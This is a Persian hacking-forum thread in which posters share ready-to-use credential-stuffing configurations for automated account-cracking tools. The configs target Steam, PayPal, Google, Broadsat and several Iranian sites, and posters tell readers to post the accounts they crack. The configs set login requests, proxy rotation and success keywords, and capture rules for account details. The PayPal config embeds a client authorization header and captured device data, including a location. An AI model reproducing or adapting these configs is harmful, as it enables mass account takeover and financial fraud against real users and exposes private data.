رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Cr4cker

کانفیگ سایت های مختلف ( مهم )

پست های پیشنهاد شده

DeathByCaptcha

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

کانفیگ سایت payline

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


گرگ را از هر طرف بخوانی همان گرگ است.

Y!H:xn--apple-bq1j

ElvaT0R.gif

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Conifg Broadsat[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
F31F4C6105CE05A6F693EE13431A58A8=0
616C05524D21EF0DB4FD0E0D0595DAB8=0
5E40B7E74236E9F4EB24B0DCDCEA60EF=14372


[settings]
SiteURL=http://www.broadsat.com/
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
ComboMode=0
EmailFilter=0
EmailMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
blnNoProxies=1
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
RequestMethod=2
Referer=0
POSTData=username=<USER>&password=<PASS>


[Fake]
AfterFP=1
blnSuccess=0
SuccessRetries=3
blnProcessErrors=0
blnCompleteNot=1
EnableConHits=0
ConHits=0
FollowRedirect=1
EnableConLength=0
ConLength=-1
SourceTags=1
UserField=0
HTTPFollow=1
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3


[Keywords]
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderFail=0
EnableHeaderRetry=0
HeaderSuccess=
HeaderBan=
HeaderFail=
HeaderRetry=
EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=0
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess=ok
SourceBan=
SourceFail=Login or password incorrect
SourceRetry=


[Form]
IAParse=0
LoginPostData=
LoginMethod=1
LoginHeader=0
Action=http://www.broadsat.com/doLogin
Username=username
Password=password
Email=
AddData=
CustomData=
NoIndex=
Cookie=
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=http://www.broadsat.com/
RedPostData=
RedKeys=<Source>||logout;<Source>||ok
DataDesc=Credits
CaptureParsingCode=ts">|<|#00|#00|0|#00|#00|0
RefreshSession=0
RefreshCookie=0
FormHeader=1
AjaxHeader=0
RedHeader=1
IAMethod=2
POSTMethod=2
RedMethod=1
ImageAfterAjax=0
blnBasic=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1


[Ajax]
Variables=
PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None
RedURL=http://www.broadsat.com/


[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

کانفیگ سایت کافه فیلم چروکسی لس + هیت ویژه

 

خدمت شما

 

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

اکانت زدید تو انجمن قرار بدین

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 


مدرس دوره های CEH , Pwk , Linux lpic 1 , 2 و...

 

ای دی تلگرام

 

@sajjadteymouri

زندگی در بردگی شرمندگی است

معنی آزاد بودن زندگـی است

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

کانفیگ سایت دیسکوگرافی دانلود موزیک چروکسی لس بسیار سریع

 

بات رو روی 5 تا 7 بزارید و اکانت که زدید تو انجمن قرار بدید

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.

 

 

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


مدرس دوره های CEH , Pwk , Linux lpic 1 , 2 و...

 

ای دی تلگرام

 

@sajjadteymouri

زندگی در بردگی شرمندگی است

معنی آزاد بودن زندگـی است

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

کانفیگ سایت مدیاسیتی هیت ویژه ( هر چی میزنه همه ویژه)

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


مدرس دوره های CEH , Pwk , Linux lpic 1 , 2 و...

 

ای دی تلگرام

 

@sajjadteymouri

زندگی در بردگی شرمندگی است

معنی آزاد بودن زندگـی است

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

vip.turk-diziler1.ir

 

 

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


 

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Config Steam+Captura


[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
90E743E9DCED3499AACE0B80EA2B499D=777
5608F78527B11E3BBF0407B6C3BD1724=126561
5B7381B4E7D0466EBF8769FC05FF8414=1813
ABC41775118ED5DF25CD87079C9FC374=6067
DADA0B14F14BCE503FDE5033CD6CEFB0=150213
DEC5ECF007A59043B6708C1D933E4B8A=457536
95A45ED586E0AD35D44E163ABFA9CA09=38731
5C9E80633EE7E5C5EC0E3640EE889632=21807
77AE545FE090C8DADB11C23918166215=37022
6EC43C7EFE2FC16978E8D5E2F11D3ACF=19397
9C9C4A8FD8372B450AD441BA18CC0ED5=49374

[settings]
SiteURL=https://store.steampowered.com/login/?|=english
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
ComboMode=0
EmailFilter=0
EmailMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
blnNoProxies=0
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|Referer: https://store.steampowered.com|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
RequestMethod=2
Referer=1
POSTData=username=<USER>&password=<PASS>&donotcache=1509745949238&password=<pass>&username=<user>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp=252100750000&remember_login=false&donotcache=1509745949238&password=<pass>&username=<user>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp=252100750000&remember_login=false

[Fake]
AfterFP=1
blnSuccess=0
SuccessRetries=3
blnProcessErrors=0
blnCompleteNot=1
EnableConHits=0
ConHits=0
FollowRedirect=1
EnableConLength=0
ConLength=-1
SourceTags=1
UserField=0
HTTPFollow=1
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3

[Keywords]
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderFail=0
EnableHeaderRetry=0
HeaderSuccess=
HeaderBan=
HeaderFail=
HeaderRetry=
EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=1
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess="success":True;games
SourceBan=Please verify your humanity by re-entering the characters below
SourceFail="success":false;message":"Incorrect login;captcha_needed":true;"emailauth_needed":true,
SourceRetry=

[Form]
IAParse=0
LoginPostData=
LoginMethod=2
LoginHeader=0
Action=https://store.steampowered.com/login/dologin/
Username=username
Password=password
Email=
AddData=donotcache=1509745949238&password=<pass>&username=<user>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp=252100750000&remember_login=false
CustomData=donotcache=1509745949238&password=<pass>&username=<user>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp=252100750000&remember_login=false
NoIndex=
Cookie=sessionid=bbd94f5d8b560053c38f51ee; browserid=1161227397643602191; Max-Age=31536000; steamCountry=GB%7C9e623547ed62432eab2e5ec626cda3b1
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=https://store.steampowered.com/login/getrsakey/
AjaxPOSTData=donotcache=1509745949238&password=<pass>&username=<user>&twofactorcode=&emailauth=&loginfriendlyname=&captchagid=-1&captcha_text=&emailsteamid=&rsatimestamp=252100750000&remember_login=false
AjaxData=rsatimestamp
AjaxParsingCode=mp":"|"|#00|#00|0|#00|#00|0
RefData=
ParsingCode=
FormRedirectUrl=http://steamcommunity.com/profiles/
RedPostData=
RedKeys=<Source>||login_complete":true
DataDesc=ID&Game
CaptureParsingCode=<steamID64>|</steamID64>|#00|RedURL|0|#00|#00|0&<name><![CDATA[|]]></name>|#00|#00|0|#00|#00|1
RefreshSession=0
RefreshCookie=1
FormHeader=1
AjaxHeader=0
RedHeader=0
IAMethod=2
POSTMethod=2
RedMethod=1
ImageAfterAjax=0
blnBasic=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=RSAmodulus||Intermediate Action||None||ParsingCode||:"|"|#00|#00|0|#00|#00|0||None||None||Username||||-1||-1||0||0||0||0&&keymod||Intermediate Action||SetParameterIndex||Costant||0||None||SetParameterValue||RSAmodulus||||-1||0||0||0||0||0&&exponent||Intermediate Action||SetParameterIndex||Costant||1||None||SetParameterValue||Costant||010001||-1||-1||0||0||0||0&&hex||Intermediate Action||RSAPKCS15||Password||||None||None||Username||||-1||-1||0||0||0||0&&hexto64||Intermediate Action||HexTo64||hex||||None||None||hex||||3||3||0||0||0||0&&urlencode||Intermediate Action||URLEncode||hexto64||||None||None||Username||||4||-1||0||0||0||0&&setindex2||Intermediate Action||SetParameterIndex||Costant||0||None||SetParameterValue||urlencode||||-1||5||0||0||0||0&&setfield||Intermediate Action||SetField||Password||||None||None||Username||||-1||-1||0||0||0||0&&1red2||Post Action||None||ParsingCode||steamid":"|"|#00|#00|0|#00|#00|0||None||None||Username||||-1||-1||0||0||0||0&&2red2||Post Action||None||1red2||||&||None||Costant||/games/?tab=all#26xml=1||8||-1||0||0||0||0
PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&setfield&&None&&None&&2red2&&None&&None&&None
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng


برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


Iran Cyber Security Group

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

Config Instagram ( Proxyless And Full Capture ) - Bot Between 1 to 10

برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


ذوالفقار حیدریم یکباره طوفان می کنیم // پایگاه کفر را با خاک یکسان می کنیم

خدشه ای وارد شود بر مرقد آل علی // کربلا را تا مدینه بیت الاحزان می کنیم

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

PayPal

Hit high

نیاز به پروک*سی


[Wordlist]
UserIndex=1
PassIndex=2
EmailIndex=0
854AFB2DC2DD3B72F0E5CEA6CAA5EF35=46
8CE645088B2EB008CFE3E223C4721CE0=46
2B4BE2A2EE46E281B72C374EED6AAC65=46
85F71F65EA2D7E399DBD175DC4435D3D=46
D7FAD4414A24F1C2DA34EBD2F3D5F372=7401

[settings]
SiteURL=https://api.paypal.com/v1/oauth2/login
Timeout=20
WaitBot=0
ResolveHost=0
ComboFilter=0
ComboMode=0
EmailFilter=0
EmailMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
Email=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordEmail=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
blnNoProxies=0
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: PayPalSDK/PPH 267000 (iPhone; iOS 9.2)|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|Authorization: Basic QWExMEVCQ3pGVWZud2Vubnl3dU5Jc3g0UXo0SmNwZ25uWjk2eUNXZFloU19SbTNJUVRIZWpxbXdURTRrOg==|X-PAYPAL-REQUEST-SOURCE: MPA-DEVICE_iOS_iPhone6,1_9.2_SDK_1.4.9_com.paypal.here_2.6.7_L0|
RequestMethod=2
Referer=0
POSTData=email=<USER>&password=<PASS>&response_type=token&rememberme=true&scope=https%3A%2F%2Fapi.paypal.com%2Fv1%2Fvault%2Fcredit-card%20openid%20https%3A%2F%2Fapi.paypal.com%2Fv1%2Fvault%2Fcredit-card%2F.%2A%20https%3A%2F%2Furi.paypal.com%2Fservices%2Fpaypalhere&return_authn_schemes=true&grant_type=password&risk_data=%7B%22os_version%22%3A%229.2%22%2C%22c%22%3A%2212%22%2C%22device_model%22%3A%22iPhone%205s%28GSM%29%22%2C%22app_id%22%3A%22com.paypal.here%22%2C%22locale_lang%22%3A%22en%22%2C%22comp_version%22%3A%223.5.1%22%2C%22location%22%3A%7B%22lng%22%3A51.64169494491625%2C%22lat%22%3A32.6421754246147%2C%22timestamp%22%3A1461882278665%2C%22acc%22%3A165%7D%2C%22local_identifier%22%3A%227a854d28-262a-4eb0-9854-175698e2d6c8%22%2C%22sms_enabled%22%3Atrue%2C%22app_guid%22%3A%22eb934e44c9e78649eefa2f58bceb9d3f3b8e4145%22%2C%22cloud_identifier%22%3A%2217f18c74-cdb1-47e2-82e5-1ed537a1a392%22%2C%22vendor_identifier%22%3A%228067B7FF-C665-433D-A15C-4BDC292D9C45%22%2C%22notif_token%22%3Anull%2C%22os_type%22%3A%22iOS%22%2C%22conf_url%22%3A%22https%3A%5C%2F%5C%2Fwww.paypalobjects.com%5C%2Fwebstatic%5C%2Frisk%5C%2Fdyson_config_ios_v4.json%22%2C%22conf_version%22%3A%224.0%22%2C%22ip_addrs%22%3A%22192.168.1.36%22%2C%22is_rooted%22%3Afalse%2C%22proxy_setting%22%3A%22host%3D192.168.1.35%2Cport%3D8888%2Ctype%3DkCFProxyTypeHTTPS%22%2C%22total_storage_space%22%3A%2212718485504%22%2C%22source_app%22%3A10%2C%22payload_type%22%3A%22full%22%2C%22ds%22%3Atrue%2C%22pairing_id%22%3A%224b6b7bb2210d4972b6755567efd208bd%22%2C%22dc_id%22%3A%229728c3c46d03addf4c1081472c7ccf7c%22%2C%22ip_addresses%22%3A%5B%22%3A%3A1%22%2C%22127.0.0.1%22%2C%22fe80%3A%3A1%22%2C%22fe80%3A%3A69%3A2d30%3A97a2%3A89e2%22%2C%22192.168.1.36%22%2C%22fe80%3A%3A80de%3A24ff%3Afe25%3A6932%22%5D%2C%22bssid%22%3A%2248%3Aee%3Ac%3Aa5%3Aa8%3Ab3%22%2C%22tz%22%3A16200000%2C%22locale_country%22%3A%22US%22%2C%22email_configured%22%3Atrue%2C%22tz_name%22%3A%22Asia%5C%2FTehran%22%2C%22linker_id%22%3A%221bc4e94f-8217-41c4-80d7-6f6b7ee7a48e%22%2C%22pin_lock_last_timestamp%22%3A1461882119368%2C%22source_app_version%22%3A%222.6.7%22%2C%22conn_type%22%3A%22wifi%22%2C%22risk_comp_session_id%22%3A%226932c8e4-e220-4c05-8b21-28b728400ec3%22%2C%22ssid%22%3A%22Mohamm%40d%22%2C%22location_auth_status%22%3A%22authorizedWhenInUse%22%2C%22is_emulator%22%3Afalse%2C%22app_version%22%3A%222.6.7%22%2C%22device_name%22%3A%22iPhone%22%2C%22timestamp%22%3A1461882281167%7D&app_info=%7B%22device_app_id%22%3A%22APP-4XA127925G233932C%22%2C%22client_platform%22%3A%22APPLE%22%2C%22app_version%22%3A%22267000%22%7D&redirect_uri=https%3A%2F%2Fwww.paypal.com%2Fpph&device_info=%7B%22device_os_version%22%3A%229.2%22%2C%22device_name%22%3A%22iPhone%22%2C%22device_key_type%22%3A%22APPLE_PHONE%22%2C%22is_device_simulator%22%3Afalse%2C%22device_identifier%22%3A%22eb934e44c9e78649eefa2f58bceb9d3f3b8e4145%22%2C%22device_type%22%3A%22iPhone%22%2C%22device_model%22%3A%22iPhone%22%2C%22device_os%22%3A%22iPhone%20OS%22%7D

[Fake]
AfterFP=0
blnSuccess=0
SuccessRetries=3
blnProcessErrors=1
blnCompleteNot=1
EnableConHits=0
ConHits=0
FollowRedirect=0
EnableConLength=0
ConLength=-1
SourceTags=1
UserField=0
HTTPFollow=1
blnForbToOK=0
ForbToOkLength=1000
blnBadOcrCode=0
BadOcrCodeRetries=3

[Keywords]
EnableHeaderSuccess=0
EnableHeaderBan=1
EnableHeaderFail=0
EnableHeaderRetry=1
HeaderSuccess=
HeaderBan=<FIELD:SET-COOKIE>||https://rocket.decaturco.k12.in.us/access/;Moved Temporarily;<FIELD:CONTENT-LENGTH>||0;<FIELD:CONTENT-LENGTH>||2533
HeaderFail=
HeaderRetry=<FIELD:CONTENT-LENGTH>||2534
EnableGlobalSourceRetry=1
EnableSourceSuccess=1
EnableSourceBan=1
EnableSourceFail=1
EnableSourceRetry=0
SourceSuccess=scope"
SourceBan=User has exceeded max attempts
SourceFail=Invalid user credentials
SourceRetry=

[Form]
IAParse=0
LoginPostData=
LoginMethod=1
LoginHeader=0
Action=https://api.paypal.com/v1/oauth2/login
Username=email
Password=password
Email=
AddData=response_type=token&rememberme=true&scope=https%3A%2F%2Fapi.paypal.com%2Fv1%2Fvault%2Fcredit-card%20openid%20https%3A%2F%2Fapi.paypal.com%2Fv1%2Fvault%2Fcredit-card%2F.%2A%20https%3A%2F%2Furi.paypal.com%2Fservices%2Fpaypalhere&return_authn_schemes=true&grant_type=password&risk_data=%7B%22os_version%22%3A%229.2%22%2C%22c%22%3A%2212%22%2C%22device_model%22%3A%22iPhone%205s%28GSM%29%22%2C%22app_id%22%3A%22com.paypal.here%22%2C%22locale_lang%22%3A%22en%22%2C%22comp_version%22%3A%223.5.1%22%2C%22location%22%3A%7B%22lng%22%3A51.64169494491625%2C%22lat%22%3A32.6421754246147%2C%22timestamp%22%3A1461882278665%2C%22acc%22%3A165%7D%2C%22local_identifier%22%3A%227a854d28-262a-4eb0-9854-175698e2d6c8%22%2C%22sms_enabled%22%3Atrue%2C%22app_guid%22%3A%22eb934e44c9e78649eefa2f58bceb9d3f3b8e4145%22%2C%22cloud_identifier%22%3A%2217f18c74-cdb1-47e2-82e5-1ed537a1a392%22%2C%22vendor_identifier%22%3A%228067B7FF-C665-433D-A15C-4BDC292D9C45%22%2C%22notif_token%22%3Anull%2C%22os_type%22%3A%22iOS%22%2C%22conf_url%22%3A%22https%3A%5C%2F%5C%2Fwww.paypalobjects.com%5C%2Fwebstatic%5C%2Frisk%5C%2Fdyson_config_ios_v4.json%22%2C%22conf_version%22%3A%224.0%22%2C%22ip_addrs%22%3A%22192.168.1.36%22%2C%22is_rooted%22%3Afalse%2C%22proxy_setting%22%3A%22host%3D192.168.1.35%2Cport%3D8888%2Ctype%3DkCFProxyTypeHTTPS%22%2C%22total_storage_space%22%3A%2212718485504%22%2C%22source_app%22%3A10%2C%22payload_type%22%3A%22full%22%2C%22ds%22%3Atrue%2C%22pairing_id%22%3A%224b6b7bb2210d4972b6755567efd208bd%22%2C%22dc_id%22%3A%229728c3c46d03addf4c1081472c7ccf7c%22%2C%22ip_addresses%22%3A%5B%22%3A%3A1%22%2C%22127.0.0.1%22%2C%22fe80%3A%3A1%22%2C%22fe80%3A%3A69%3A2d30%3A97a2%3A89e2%22%2C%22192.168.1.36%22%2C%22fe80%3A%3A80de%3A24ff%3Afe25%3A6932%22%5D%2C%22bssid%22%3A%2248%3Aee%3Ac%3Aa5%3Aa8%3Ab3%22%2C%22tz%22%3A16200000%2C%22locale_country%22%3A%22US%22%2C%22email_configured%22%3Atrue%2C%22tz_name%22%3A%22Asia%5C%2FTehran%22%2C%22linker_id%22%3A%221bc4e94f-8217-41c4-80d7-6f6b7ee7a48e%22%2C%22pin_lock_last_timestamp%22%3A1461882119368%2C%22source_app_version%22%3A%222.6.7%22%2C%22conn_type%22%3A%22wifi%22%2C%22risk_comp_session_id%22%3A%226932c8e4-e220-4c05-8b21-28b728400ec3%22%2C%22ssid%22%3A%22Mohamm%40d%22%2C%22location_auth_status%22%3A%22authorizedWhenInUse%22%2C%22is_emulator%22%3Afalse%2C%22app_version%22%3A%222.6.7%22%2C%22device_name%22%3A%22iPhone%22%2C%22timestamp%22%3A1461882281167%7D&app_info=%7B%22device_app_id%22%3A%22APP-4XA127925G233932C%22%2C%22client_platform%22%3A%22APPLE%22%2C%22app_version%22%3A%22267000%22%7D&redirect_uri=https%3A%2F%2Fwww.paypal.com%2Fpph&device_info=%7B%22device_os_version%22%3A%229.2%22%2C%22device_name%22%3A%22iPhone%22%2C%22device_key_type%22%3A%22APPLE_PHONE%22%2C%22is_device_simulator%22%3Afalse%2C%22device_identifier%22%3A%22eb934e44c9e78649eefa2f58bceb9d3f3b8e4145%22%2C%22device_type%22%3A%22iPhone%22%2C%22device_model%22%3A%22iPhone%22%2C%22device_os%22%3A%22iPhone%20OS%22%7D
CustomData=
NoIndex=
Cookie=
IAction=-1
IUser=-1
IPass=-1
IEmail=-2
ICaptcha=-1
ReqReferer=
ReqCookie=
AjaxURL=
AjaxPOSTData=
AjaxData=
AjaxParsingCode=
RefData=
ParsingCode=
FormRedirectUrl=
RedPostData=
RedKeys=
DataDesc=darkso
CaptureParsingCode=.|'|#00|#00|0|#00|#00|0
RefreshSession=0
RefreshCookie=0
FormHeader=0
AjaxHeader=0
RedHeader=0
IAMethod=2
POSTMethod=2
RedMethod=1
ImageAfterAjax=0
blnBasic=0
FollowRedirectsOnIA=0
FollowRedirectsOnRed=1

[Ajax]
Variables=
PostElements2=None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None&&None
RedURL=

[OCR]
OCRMode=0
URLMode=0
ImageURLID=||
Captcha=
OCRKey=
RefreshCaptcha=0
blnContrast=0
blnBrightness=0
blnSaturation=0
blnThreshold=0
blnInvert=0
blnNoise=0
blnIsolate=0
blnResize=0
blnBorder=0
blnCharExtract=0
blnRemoveColors=0
blnStringFilter=0
blnLetter=1
blnDigits=1
blnBlur=0
blnReconstruct=0
blnLower=0
blnUpper=0
blnRemoveLines=0
blnMultiChar=0
blnCharTable=0
blnPalette=0
blnCharResize=0
blnCharSubExtraction=0
blnThreeImages=0
blnGif=0
blnCompute=0
blnBorderPre=0
Contrast=0
Brightness=0
Saturation=0
Threshold=0
Noise=1
Isolate=1
Resize=2
BorderLeft=0
BorderTop=0
BorderRight=0
BorderBottom=0
CharExtractMinBlack=0
CharExtractMaxBlack=1
CharExtractMinWidth=1
CharRotateMax=0
CharRotateSteps=5
MinLength=1
MaxLength=10
BlurRadius=1
CharExtractMaxWidth=33
CharWidthMinBlack=2
CharSpace=1
Range=0
InvertDensity=0
InvertLength=20
LineCurvatureMax=4
LineWidthMax=13
CharResize=1
CharHeight=13
GifStart=2
GifOffset=2
BorderLeftPre=0
BorderTopPre=0
BorderRightPre=0
BorderBottomPre=0
CharBorderH=5
CharBorderV=5
CharRotateBorder=5
CharExtractMinHeight=1
VerticalRejoin=30
CharExclude=
SpecialChars=
Colors=
Colors2=
Lines=Min Length: 2, Max Width: 5, Horizzontal
Language=eng
برای مشاهده این بخش نیازمند ثبت نام و یا ورود به حساب کاربری خود میباشید.


Iran Cyber Security Group

به اشتراک گذاری این ارسال


لینک به ارسال
به اشتراک گذاری در سایت های دیگر

accounts.google.com

Hit high

نیاز به پروک*سی


[Wordlist]
31BBC612C9C05B5F31A2A843FFDA87D5=101
[settings]
blnNoProxies=0
SiteURL=https://accounts.google.com/ServiceLogin?service=mail&passive=true&continue=http://mail.google.com/mail/x/ut5atua72fwv/&scc=1&ltmpl=ecobh&nui=5&btmpl=mobile
Timeout=10
WaitBot=0
ResolveHost=0
ProxyActivate=10
ProxyRatio=4
ProxyCombo=0
WaitTime=5
BanWindowWidth=1
BanWindowRatio=10
BanWindowProxies=10
RequestMethod=2
HTTPHeader=<ACTION> <FORM ACTION> <HTTP VERSION>|Accept: */*|User-Agent: <USER AGENT>|Host: <HOST>|Pragma: no-cache|Connection: keep-alive|
UserPass=0
ComboFilter=0
ComboMode=0
UsernameStart=6
UsernameEnd=8
InvalidChars=
AllowedChars=
Letters=0
Digits=0
Alpha=0
LowerUpper=0
LetterDigit=0
SpeciaChar=0
PasswordStart=6
PasswordEnd=8
PasswordInvalidChars=
PasswordAllowedChars=
PasswordLetters=0
PasswordDigits=0
PasswordAlpha=0
PasswordLowerUpper=0
PasswordLetterDigit=0
PasswordSpeciaChar=0
POSTData=Email=<USER>&Passwd=<PASS>&continue=http%3A%2F%2Fmail.google.com%2Fmail%2Fx%2Fut5atua72fwv%2F&service=mail&nui=5&dsh=758578038212077920&ltmpl=ecobh&btmpl=mobile&scc=1&timeStmp=&secTok=&GALX=C8jOr5_eIs8&PersistentCookie=yes&rmShown=1&signIn=Sign+in
[Keywords]
EnableHeaderSuccess=0
EnableHeaderBan=0
EnableHeaderFail=0
EnableHeaderRetry=0
HeaderSuccess=
HeaderBan=
HeaderFail=
HeaderRetry=
